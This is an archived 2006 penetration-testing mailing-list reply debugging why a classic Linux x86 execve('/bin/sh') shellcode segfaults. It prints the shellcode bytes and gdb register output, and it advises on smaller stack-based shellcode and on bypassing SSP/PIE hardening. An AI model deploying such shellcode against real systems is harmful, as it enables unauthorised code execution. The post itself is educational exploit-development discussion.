Penetration Testing mailing list archives
Re: Shellcode itself segfaults
From: "Justin Ferguson" <jnferguson () gmail com>
Date: Mon, 19 Jun 2006 18:25:38 -0700
Hi Paul,
------------------------------------------------------------------------------- char main[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; -------------------------------------------------------------------------------
First let me suggest naming your array something else, I don't think your C code compiled unless you renamed main() and linked it yourself (i.e. ld -e). It's a sidepoint though, name it something else, sc[] or whatever. What I see is that just before you call int 0x80, you have 11/0x0b in the eax register (correct), a pointer to the string '/bin/sh' in the ebx register (correct), a pointer to a pointer to char, however this array is supposed to be null terminated and your is not, and finally in the edx register you have a pointer to null. (gdb) p $rax $3 = 11 (gdb) x/s $rbx 0x5008a6 <sc+38>: "/bin/sh" (gdb) x/wx *$rcx 0x5008a6 <sc+38>: 0x6e69622f (gdb) 0x5008aa <sc+42>: 0x0068732f (gdb) 0x5008ae <sc+46>: 0x005008a6 (gdb) x/wx *$rdx 0x0: Cannot access memory at address 0x0 (gdb) x/wx $rdx 0x5008b2 <completed.1+2>: 0x00000000 Please look at the prototype for execve(2), and read the manpage. int execve(const char *filename, char *const argv [], char *const envp[]); 'Both argv and envp must be terminated by a null pointer.' So, your **argv is broken as its not terminated by a NULL pointer, and your **envp is broken because it is a NULL pointer. As to why it works, I've noticed through my experience that some implementations don't mind envp being NULL, while others shit the bed on you, so its best to just set one up. Aleph1's shellcode is great for learning how the stack operates, but aside from that its clunky and large, you should consider rewritting it using the stack and a series of push's/mov's as it results in a smaller shellcode and gives you what you want.
I also tested it on my gentoo-box with ssp and pie. Here it is impossible to actually smash the stack, however the shellcode itself works.
Nothing is impossible, SSP/PIE/hardened gentoo in general makes it improbable, but not impossible, the flaws in all of the hardening tools have been well documented in phrack and such. ------------------------------------------------------------------------------ This List Sponsored by: CenzicConcerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details.
------------------------------------------------------------------------------
Current thread:
- Shellcode itself segfaults Paul Sebastian Ziegler (Jun 19)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)
- Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
- Re: Shellcode itself segfaults Ronald van der Westen (Jun 20)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 20)
- Re: Shellcode itself segfaults Paul Sebastian Ziegler (Jun 21)
- Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)